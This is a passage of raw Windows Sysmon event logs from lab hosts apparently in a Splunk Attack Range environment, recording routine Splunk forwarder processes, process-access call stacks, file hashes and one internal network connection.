Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.670{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937DF55CA2182F7B3470073382125207,SHA256=FF6DC44A45A5915577CCB1F0775FC98853426DF7D08C6E57213197310CDC89AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:01.518{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D35251BA1BC20CA720B2B3E1D33247E,SHA256=CDC72726911CF9B6534025B642F570ECEE32910C571D22E55E4796013DE08CAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.485{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A7D-6216-8407-000000003802}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299656Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299655Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299654Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1A7D-6216-8407-000000003802}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299653Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.469{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A7D-6216-8407-000000003802}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299652Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.470{C8EA50B7-1A7D-6216-8407-000000003802}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:02.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91CB459ED1C967CDDC6194533FF10CB6,SHA256=B446EB2A43512A0F72D5B434B22F2C4991D4E92CB2637BBE81B2802B3C7B663A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:02.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CAEE53BF1CEF49E21ADEA3F199F414,SHA256=F3677D07B69569F38A30CB206FE6BEAE0459B102CD16190C980B4899690A0183,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:02.386{C8EA50B7-1A7D-6216-8507-000000003802}51526208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:02.002{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A7D-6216-8507-000000003802}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1A7D-6216-8507-000000003802}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:01.987{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A7D-6216-8507-000000003802}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:03.799{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4126436B72585A8556F3936CACCA32B2,SHA256=3AB7F70033448C65068E39825A83224A341317F90CDAEFC4776CEECC86AAD1C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C1651D49BA5877628703570C57A450,SHA256=9306F06CF1296AFDB94AEC8847CDF19890108D8F8EF4B26C684F0C9F981E1DDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:01.616{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51792-false10.0.1.12-8000- 10341000x8000000000000000299678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.554{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A7F-6216-8607-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.554{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1A7F-6216-8607-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.554{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.554{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.553{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.552{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.551{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A7F-6216-8607-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:03.550{C8EA50B7-1A7F-6216-8607-000000003802}5720C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 